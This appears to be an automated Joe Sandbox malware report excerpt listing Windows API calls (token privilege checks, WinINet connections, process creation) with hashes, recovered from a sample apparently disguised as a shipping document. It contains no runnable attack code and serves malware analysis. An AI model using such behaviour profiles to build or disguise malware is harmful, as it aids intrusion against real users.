                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0096B9AB,?,?,?,?,?), ref: 009BC4E7
                                                                • GetCursorPos.USER32(?), ref: 009BC534
                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0096B9AB,?,?,?), ref: 009BC56E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                • String ID:
                                                                • API String ID: 2864067406-0
                                                                • Opcode ID: f6f5385e106fd2f0eeb66eb1ed2d4b03393bcfc43a13930dd14dcaecf20e57cf
                                                                • Instruction ID: e10d5a0eb227774a55000735790a4ef18af2a828628845f294f25e8e8f503d8e
                                                                • Opcode Fuzzy Hash: f6f5385e106fd2f0eeb66eb1ed2d4b03393bcfc43a13930dd14dcaecf20e57cf
                                                                • Instruction Fuzzy Hash: 1F31DD75614018AFCB25CF58CD98EFA7BBAEB09320F044169F9058B261C771BD50EFA4
                                                                APIs
                                                                  • Part of subcall function 0098810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00988121
                                                                  • Part of subcall function 0098810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0098812B
                                                                  • Part of subcall function 0098810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0098813A
                                                                  • Part of subcall function 0098810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00988141
                                                                  • Part of subcall function 0098810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00988157
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009886A3
                                                                • _memcmp.LIBCMT ref: 009886C6
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009886FC
                                                                • HeapFree.KERNEL32(00000000), ref: 00988703
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                • String ID:
                                                                • API String ID: 1592001646-0
                                                                • Opcode ID: eeafcdfb6930cc8c302d29c9439473341f498e61441ac913a0bd0a7ef35ccaa1
                                                                • Instruction ID: 21a00a135fcad47ed264b81c989eb80fd26504afa8fcbb7e5636d5b14bc1c884
                                                                • Opcode Fuzzy Hash: eeafcdfb6930cc8c302d29c9439473341f498e61441ac913a0bd0a7ef35ccaa1
                                                                • Instruction Fuzzy Hash: F5218E72E44109EFDB10EFA8CA49BEEB7B8EF44315F554059E444A7340EB31AE05DB60
                                                                APIs
                                                                • __setmode.LIBCMT ref: 009509AE
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00997896,?,?,00000000), ref: 00935A2C
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00997896,?,?,00000000,?,?), ref: 00935A50
                                                                • _fprintf.LIBCMT ref: 009509E5
                                                                • OutputDebugStringW.KERNEL32(?), ref: 00985DBB
                                                                  • Part of subcall function 00954AAA: _flsall.LIBCMT ref: 00954AC3
                                                                • __setmode.LIBCMT ref: 00950A1A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                • String ID:
                                                                • API String ID: 521402451-0
                                                                • Opcode ID: 7a6accbea913d0a88ed146ebc8c9d50e9ec5ce279289a0108ded3399f9efaca5
                                                                • Instruction ID: 0fce96596d6b83346f8be5f28a7f4d2ada5661ac421c7bd96dd8eb6e340386fd
                                                                • Opcode Fuzzy Hash: 7a6accbea913d0a88ed146ebc8c9d50e9ec5ce279289a0108ded3399f9efaca5
                                                                • Instruction Fuzzy Hash: F6113A319042046FDB04F3B99C86BBE77AC9FC6325F140119FA05971C2EE60489A9BA1
                                                                APIs
                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009A17A3
                                                                  • Part of subcall function 009A182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009A184C
                                                                  • Part of subcall function 009A182D: InternetCloseHandle.WININET(00000000), ref: 009A18E9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                • String ID:
                                                                • API String ID: 1463438336-0
                                                                • Opcode ID: 5556866e37477fbd79376e30247cfd30c09697c44f2718e8ec782113ae6b940c
                                                                • Instruction ID: 5e46e5227a759f114f962d4466e9b10583c44319c8751d6fccf637837fea6bfd
                                                                • Opcode Fuzzy Hash: 5556866e37477fbd79376e30247cfd30c09697c44f2718e8ec782113ae6b940c
                                                                • Instruction Fuzzy Hash: 1021F331204605BFEB169F68CC40FBABBEDFF8A710F10452AFA1196650DB75D810A7E0
                                                                APIs
                                                                • GetFileAttributesW.KERNEL32(?,009BFAC0), ref: 00993A64
                                                                • GetLastError.KERNEL32 ref: 00993A73
                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00993A82
                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,009BFAC0), ref: 00993ADF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                • String ID:
                                                                • API String ID: 2267087916-0
                                                                • Opcode ID: 553d6e86bb65936ec80262f756bced1b57dc79a95a1a0087a123b6ed46c5e7a8
                                                                • Instruction ID: 850cff95230fdc7131fcd104888ff609a9654e7b770e8d4bfb4658acb91650dd
                                                                • Opcode Fuzzy Hash: 553d6e86bb65936ec80262f756bced1b57dc79a95a1a0087a123b6ed46c5e7a8
                                                                • Instruction Fuzzy Hash: CA2183745092019F8B10DF2CC9919AAB7E8EF59364F108A2DF4A9C72A1D731DE46CB42
                                                                APIs
                                                                  • Part of subcall function 0098F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0098DCD3,?,?,?,0098EAC6,00000000,000000EF,00000119,?,?), ref: 0098F0CB
                                                                  • Part of subcall function 0098F0BC: lstrcpyW.KERNEL32(00000000,?,?,0098DCD3,?,?,?,0098EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0098F0F1
                                                                  • Part of subcall function 0098F0BC: lstrcmpiW.KERNEL32(00000000,?,0098DCD3,?,?,?,0098EAC6,00000000,000000EF,00000119,?,?), ref: 0098F122
                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0098EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0098DCEC
                                                                • lstrcpyW.KERNEL32(00000000,?,?,0098EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0098DD12
                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0098EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0098DD46
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                • String ID: cdecl
                                                                • API String ID: 4031866154-3896280584
                                                                • Opcode ID: 2c802322411c59c3651a8962e0566bb98d6719526c68b295ce988c3cc0d20ff9
                                                                • Instruction ID: 9b74623d1e52f02d95618f709def0f8fb854a4a78cf6321e88e3572c296914d2
                                                                • Opcode Fuzzy Hash: 2c802322411c59c3651a8962e0566bb98d6719526c68b295ce988c3cc0d20ff9
                                                                • Instruction Fuzzy Hash: 5111BE3A200305EFCB25AF74DC45A7A77A8FF85360B40952AE806CB3E0EB719841D791
                                                                APIs
                                                                • _free.LIBCMT ref: 00965101
                                                                  • Part of subcall function 0095571C: __FF_MSGBANNER.LIBCMT ref: 00955733
                                                                  • Part of subcall function 0095571C: __NMSG_WRITE.LIBCMT ref: 0095573A
                                                                  • Part of subcall function 0095571C: RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000000,?,?,?,00950DD3,?), ref: 0095575F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_free
                                                                • String ID:
                                                                • API String ID: 614378929-0
                                                                • Opcode ID: d7751542a8590e01f0b846eff155d87acd6f00ae7e4ce05b35e5a2f05be7b4f6
                                                                • Instruction ID: 63f17704d12dae781a1b945ea93d28167cf95d028cb4bb9d83bcc3c7f52818be
                                                                • Opcode Fuzzy Hash: d7751542a8590e01f0b846eff155d87acd6f00ae7e4ce05b35e5a2f05be7b4f6
                                                                • Instruction Fuzzy Hash: C411E0B290CA12AFCB316F75EC0676E379C9B463A2F13492AFD09AA150DE34C9449790
                                                                APIs
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00997896,?,?,00000000), ref: 00935A2C
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00997896,?,?,00000000,?,?), ref: 00935A50
                                                                • gethostbyname.WSOCK32(?,?,?), ref: 009A6399
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A63A4
                                                                • _memmove.LIBCMT ref: 009A63D1
                                                                • inet_ntoa.WSOCK32(?), ref: 009A63DC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                • String ID:
                                                                • API String ID: 1504782959-0
                                                                • Opcode ID: 90cc226df55b476f4e963759ec340609eeb10c3afdd6dc8fe9863229801f1fd2
                                                                • Instruction ID: dc78905631e588c353ff1cef7ea3bf9266be2a2b4634825552047a528ff487e1
                                                                • Opcode Fuzzy Hash: 90cc226df55b476f4e963759ec340609eeb10c3afdd6dc8fe9863229801f1fd2
                                                                • Instruction Fuzzy Hash: 0D116331500109AFCB00FBA4DD96EEEB7B8AF89310B544165F506E7261DB309F04DFA1
                                                                APIs
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00988B61
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00988B73
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00988B89
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00988BA4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 3306209b8b921eafd5a8cf717ad3e63d1e62f426baa6401bbac3abcc577e433e
                                                                • Instruction ID: 902d61d3fb0346469bb5ca384180ac2f991bc5bc3053eeb7324339e5ed4066ad
                                                                • Opcode Fuzzy Hash: 3306209b8b921eafd5a8cf717ad3e63d1e62f426baa6401bbac3abcc577e433e
                                                                • Instruction Fuzzy Hash: 15115E79901218FFDB10DFA5CC84FAEBB78FB48310F2040A5E900B7290DA716E10DBA4
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • DefDlgProcW.USER32(?,00000020,?), ref: 009312D8
                                                                • GetClientRect.USER32(?,?), ref: 0096B5FB
                                                                • GetCursorPos.USER32(?), ref: 0096B605
                                                                • ScreenToClient.USER32(?,?), ref: 0096B610
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                • String ID:
                                                                • API String ID: 4127811313-0
                                                                • Opcode ID: 8b47fab4a4476928fb3f8a1b3183c04fb366b909e3b79645c385946b8c0114f9
                                                                • Instruction ID: a725f7d8c22fe9a24697ae1726de1a5254c883b5d75e42308e69d27db91cceb3
                                                                • Opcode Fuzzy Hash: 8b47fab4a4476928fb3f8a1b3183c04fb366b909e3b79645c385946b8c0114f9
                                                                • Instruction Fuzzy Hash: 3D113639A10119EFCB10EFA8D9899FF7BB8EB45310F400556FA21E7261C730BA519FA5
                                                                APIs
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0098FCED,?,00990D40,?,00008000), ref: 0099115F
                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0098FCED,?,00990D40,?,00008000), ref: 00991184
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0098FCED,?,00990D40,?,00008000), ref: 0099118E
                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0098FCED,?,00990D40,?,00008000), ref: 009911C1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CounterPerformanceQuerySleep
                                                                • String ID:
                                                                • API String ID: 2875609808-0
                                                                • Opcode ID: a888f7ae02deca2422a947586bf546f225e1c20e942d966d1d52793160693b7f
                                                                • Instruction ID: 21245caad6821170b39d6d2482a28e3c342d8505b99b7af19b802dc19257cf3d
                                                                • Opcode Fuzzy Hash: a888f7ae02deca2422a947586bf546f225e1c20e942d966d1d52793160693b7f
                                                                • Instruction Fuzzy Hash: CD118E31C0851EEBCF10DFA9D988AEEBB78FF09711F004555EA45B2240CB309550DB91
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0098D84D
                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0098D864
                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0098D879
                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0098D897
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                • String ID:
                                                                • API String ID: 1352324309-0
                                                                • Opcode ID: 46bbd844be28b95659ed67ef42b5a3fc4f0dd1a001bb7409a315c8beb68929ff
                                                                • Instruction ID: dd4a3b5360e39d4c5466969f4f9d45bfa0acbfeb8006f3bd848d0f1ff53897bb
                                                                • Opcode Fuzzy Hash: 46bbd844be28b95659ed67ef42b5a3fc4f0dd1a001bb7409a315c8beb68929ff
                                                                • Instruction Fuzzy Hash: 98116175606304EBE320AF51DD0CF97BBBCEB00B10F108969A516D6290D7B4E549ABA1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                • String ID:
                                                                • API String ID: 3016257755-0
                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                • Instruction ID: 21c380c5aaf6e3c68071e84aef3455f051ade9fb8271f1f5ce83c06758645c25
                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                • Instruction Fuzzy Hash: 1E014C7244814ABBCF165FC4CC01CEE7F66BB18398F588455FE5898031D237C9B1ABA1
                                                                APIs
                                                                • GetWindowRect.USER32(?,?), ref: 009BB2E4
                                                                • ScreenToClient.USER32(?,?), ref: 009BB2FC
                                                                • ScreenToClient.USER32(?,?), ref: 009BB320
                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009BB33B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                • String ID:
                                                                • API String ID: 357397906-0
                                                                • Opcode ID: 64c7d2ccc6a19de53a4af1cde34b2e0a985c8a288b9ac129d4e1727cc4eb9b79
                                                                • Instruction ID: c46cdfad832672947409c07f931e5e7698c26b8be2febc69d3159f5f28d87da6
                                                                • Opcode Fuzzy Hash: 64c7d2ccc6a19de53a4af1cde34b2e0a985c8a288b9ac129d4e1727cc4eb9b79
                                                                • Instruction Fuzzy Hash: 9A1143B9D0420DEFDB41CFA9C9849EEBBF9FB08310F108166E914E3220D775AA559F50
                                                                APIs
                                                                • _memset.LIBCMT ref: 009BB644
                                                                • _memset.LIBCMT ref: 009BB653
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009F6F20,009F6F64), ref: 009BB682
                                                                • CloseHandle.KERNEL32 ref: 009BB694
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                • String ID:
                                                                • API String ID: 3277943733-0
                                                                • Opcode ID: 2f606d95e2fd98c221098ba40716c5d2abf5207a2d33b08793440a7ae3ffc3bd
                                                                • Instruction ID: 828772a21d0c8eebee3c11e52378322fa732e2ac556309cbfd5b98ed325936e5
                                                                • Opcode Fuzzy Hash: 2f606d95e2fd98c221098ba40716c5d2abf5207a2d33b08793440a7ae3ffc3bd
                                                                • Instruction Fuzzy Hash: E0F012B2554304BBE3106766BC06FBB7E9CEB097A5F444021FB08E9192D7765C10D7A8
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00996BE6
                                                                  • Part of subcall function 009976C4: _memset.LIBCMT ref: 009976F9
                                                                • _memmove.LIBCMT ref: 00996C09
                                                                • _memset.LIBCMT ref: 00996C16
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00996C26
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                • String ID:
                                                                • API String ID: 48991266-0
                                                                • Opcode ID: 28acecdd45e7dacf6f0febdee30e16c37767f00498e8ca560b2f282d1030f379
                                                                • Instruction ID: ff6d18785f94881c9f506026662bc766eb31598467e8a5fb68eb1bbb0e14c94a
